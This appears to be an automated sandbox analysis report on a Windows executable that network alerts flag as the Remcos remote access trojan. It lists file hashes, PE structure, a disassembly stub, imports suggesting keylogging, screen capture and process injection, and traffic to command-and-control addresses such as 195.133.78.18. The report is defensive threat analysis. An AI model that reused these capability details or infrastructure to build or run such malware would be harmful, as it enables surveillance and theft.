                                                                                                                                                                                                                                                                                                                            Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1855404220\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):962
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                            MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                            SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                            SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                            SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1855404220\eac6d874-e6d2-4fbc-8f73-8a235cc908ab.tmp

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):6.586523892276906
                                                                                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                            File name:17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                                                                                                                                                                                                                                                                                                                            File size:493'056 bytes
                                                                                                                                                                                                                                                                                                                            MD5:41496241ae1ad7c561d749f7d479caff
                                                                                                                                                                                                                                                                                                                            SHA1:e2935d471b03f8efc40460d29e2c07ee5a26f8de
                                                                                                                                                                                                                                                                                                                            SHA256:ad4a934328e699a5065c7c55ab3399d74134b5e97401175948b5296faf98d2a8
                                                                                                                                                                                                                                                                                                                            SHA512:50f27e89d4167087e60a251189766cabd71e81b52713d99687cf8aa70ceb220c450a175bc1559bd4e981fcb1fe3c4ee59ced8c0501abf5f234f336e318563fe7
                                                                                                                                                                                                                                                                                                                            SSDEEP:12288:79PgP3HAMwIGjY4vce6lnBthn5HSRVMf139F5woxr+IwtHwBtFhCsvZD54j+P32:p43HfwIGYMcn5PJrZa+
                                                                                                                                                                                                                                                                                                                            TLSH:B4A4BE01B6D2C072D57625300D26E775DEBDBD212835897BB3DA1D67FE30180E63AAB2
                                                                                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.

                                                                                                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                                                                                                            Icon Hash:95694d05214c1b33

                                                                                                                                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                                                            Entrypoint:0x433b4a
                                                                                                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                            Time Stamp:0x6752B172 [Fri Dec 6 08:10:26 2024 UTC]
                                                                                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                                            Import Hash:e77512f955eaf60ccff45e02d69234de

                                                                                                                                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                                                                                            call 00007F1A84529683h
                                                                                                                                                                                                                                                                                                                            jmp 00007F1A84528FDFh
                                                                                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                                                                                            sub esp, 00000324h
                                                                                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                                                                                            push 00000017h
                                                                                                                                                                                                                                                                                                                            call 00007F1A8454B4B9h
                                                                                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                                                                                            je 00007F1A84529167h
                                                                                                                                                                                                                                                                                                                            mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                                                            int 29h
                                                                                                                                                                                                                                                                                                                            push 00000003h
                                                                                                                                                                                                                                                                                                                            call 00007F1A84529324h
                                                                                                                                                                                                                                                                                                                            mov dword ptr [esp], 000002CCh
                                                                                                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                                                                                            call 00007F1A8452B63Bh
                                                                                                                                                                                                                                                                                                                            add esp, 0Ch
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000274h], eax
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000278h], ecx
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-0000027Ch], edx
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000280h], ebx
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000284h], esi
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000288h], edi
                                                                                                                                                                                                                                                                                                                            mov word ptr [ebp-0000025Ch], ss
                                                                                                                                                                                                                                                                                                                            mov word ptr [ebp-00000268h], cs
                                                                                                                                                                                                                                                                                                                            mov word ptr [ebp-0000028Ch], ds
                                                                                                                                                                                                                                                                                                                            mov word ptr [ebp-00000290h], es
                                                                                                                                                                                                                                                                                                                            mov word ptr [ebp-00000294h], fs
                                                                                                                                                                                                                                                                                                                            mov word ptr [ebp-00000298h], gs
                                                                                                                                                                                                                                                                                                                            pushfd
                                                                                                                                                                                                                                                                                                                            pop dword ptr [ebp-00000264h]
                                                                                                                                                                                                                                                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-0000026Ch], eax
                                                                                                                                                                                                                                                                                                                            lea eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000260h], eax
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000324h], 00010001h
                                                                                                                                                                                                                                                                                                                            mov eax, dword ptr [eax-04h]
                                                                                                                                                                                                                                                                                                                            push 00000050h
                                                                                                                                                                                                                                                                                                                            mov dword ptr [ebp-00000270h], eax
                                                                                                                                                                                                                                                                                                                            lea eax, dword ptr [ebp-58h]
                                                                                                                                                                                                                                                                                                                            push 00000000h
                                                                                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                                                                                            call 00007F1A8452B5B1h

                                                                                                                                                                                                                                                                                                                            Rich Headers

                                                                                                                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                                                                                                                            • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                                                                                            Data Directories

                                                                                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0200x104.rdata
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x4a88.rsrc
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b0000x3b88.reloc
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x6c5100x38.rdata
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x6c5e80x18.rdata
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6c5480x40.rdata
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x570000x4f4.rdata
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                            Sections

                                                                                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                            .text0x10000x55f2d0x56000c9fb1fecb5f01a3c88e2bc00eccd57c4False0.5739377043968024data6.621523378040251IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                            .rdata0x570000x18b000x18c000ba285a9a28b1dec254a7539ab18f8d0False0.4981455176767677OpenPGP Secret Key Version 65.75873851406894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                            .data0x700000x5d8c0xe0006414e748130e7e668ba2ba172d63448False0.22684151785714285data3.093339598098017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                            .rsrc0x760000x4a880x4c00f18524fdc8b743efff9e115a0b2ab0b6False0.2731805098684211data3.97540491360943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                            .reloc0x7b0000x3b880x3c00b875bbd60cc90da8a22f40034fe9606eFalse0.7575520833333333data6.702930468027394IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                                            Resources

                                                                                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                            RT_ICON0x7618c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                                                                                                                                                                                                                                                                                                            RT_ICON0x765f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                                                                                                                                                                                                                                                                                                            RT_ICON0x76f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                                                                                                                                                                                                                                                                                                            RT_ICON0x780240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                                                                                                                                                                                                                                                                                                            RT_RCDATA0x7a5cc0x47adata1.0095986038394416
                                                                                                                                                                                                                                                                                                                            RT_GROUP_ICON0x7aa480x3edataEnglishUnited States0.8064516129032258

                                                                                                                                                                                                                                                                                                                            Imports

                                                                                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                                                                                            KERNEL32.dllExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, HeapReAlloc, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetACP, GetModuleHandleExW, MoveFileExW, LoadLibraryExW, RaiseException, RtlUnwind, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, MultiByteToWideChar, DecodePointer, EncodePointer, TlsFree, TlsSetValue, GetFileSize, TerminateThread, GetLastError, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, CreateDirectoryW, GetLogicalDriveStringsA, DeleteFileW, FindNextFileA, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, GetProcAddress, CreateMutexA, GetCurrentProcess, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, FindNextVolumeW, TlsGetValue, TlsAlloc, SwitchToThread, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, InitializeCriticalSectionAndSpinCount, SetEndOfFile
                                                                                                                                                                                                                                                                                                                            USER32.dllDefWindowProcA, TranslateMessage, DispatchMessageA, GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, GetWindowThreadProcessId, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CreateWindowExA, SendInput, EnumDisplaySettingsW, mouse_event, MapVirtualKeyA, TrackPopupMenu, CreatePopupMenu, AppendMenuA, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetIconInfo, GetSystemMetrics, CloseWindow, DrawIcon
                                                                                                                                                                                                                                                                                                                            GDI32.dllBitBlt, CreateCompatibleBitmap, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteDC, DeleteObject, CreateDCA, GetObjectA, SelectObject
                                                                                                                                                                                                                                                                                                                            ADVAPI32.dllLookupPrivilegeValueA, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, RegDeleteKeyA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW
                                                                                                                                                                                                                                                                                                                            SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                                                                                                                                                                                                                                                                                                            ole32.dllCoInitializeEx, CoGetObject, CoUninitialize
                                                                                                                                                                                                                                                                                                                            SHLWAPI.dllStrToIntA, PathFileExistsW, PathFileExistsA
                                                                                                                                                                                                                                                                                                                            WINMM.dllmciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInStart, waveInUnprepareHeader, waveInOpen, waveInAddBuffer, waveInPrepareHeader, PlaySoundW
                                                                                                                                                                                                                                                                                                                            WS2_32.dllsend, WSAStartup, socket, connect, WSAGetLastError, recv, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, gethostbyname
                                                                                                                                                                                                                                                                                                                            urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                                                                                                                                                                                                                                                                                                            gdiplus.dllGdipAlloc, GdiplusStartup, GdipGetImageEncoders, GdipLoadImageFromStream, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCloneImage
                                                                                                                                                                                                                                                                                                                            WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                                                                                                                                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                            2025-01-05T08:39:01.391447+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649709195.133.78.187346TCP
                                                                                                                                                                                                                                                                                                                            2025-01-05T08:39:02.625764+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649711195.133.78.187346TCP
                                                                                                                                                                                                                                                                                                                            2025-01-05T08:39:02.625991+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.649710195.133.78.187346TCP
                                                                                                                                                                                                                                                                                                                            2025-01-05T08:39:03.736476+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649712178.237.33.5080TCP

                                                                                                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:38:57.079027891 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:38:57.079027891 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:38:57.391478062 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:00.741338968 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:00.746195078 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:00.746304035 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:00.752301931 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:00.757314920 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.342209101 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.391447067 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.473707914 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.478173018 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.482978106 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.483059883 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.488027096 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.488116026 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.493676901 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.772883892 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.774610043 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.779423952 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.901417017 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.951666117 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.953922987 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.956871033 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.956964970 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.960421085 CET497117346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.960762024 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.965522051 CET734649711195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.965603113 CET497117346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.965735912 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.969291925 CET497117346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:01.974345922 CET734649711195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:02.572063923 CET734649711195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:02.574011087 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:02.625763893 CET497117346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:02.625991106 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:02.703572035 CET734649711195.133.78.18192.168.2.6
